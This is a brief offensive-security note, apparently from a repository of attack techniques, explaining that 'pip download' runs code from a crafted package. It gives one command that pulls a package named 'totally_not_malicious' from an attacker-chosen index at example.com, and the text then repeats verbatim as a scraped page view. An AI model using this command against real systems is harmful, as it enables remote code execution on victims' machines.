killchain-compendium/Exploits/Python/Pip.md

# PIP Exploits

## pip download

Python pip executes tar files after the download option has been triggered.
Therefore, a hand crafted python module needs to be created and build.
After that pip can be used in the following way
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```

An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
bump 2023-05-12 19:15:13 +02:00			`# PIP Exploits`

			`## pip download`

			`Python pip executes tar files after the download option has been triggered.`
			`Therefore, a hand crafted python module needs to be created and build.`
			`After that pip can be used in the following way`
			```sh
			`pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v`
			```

			`An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)`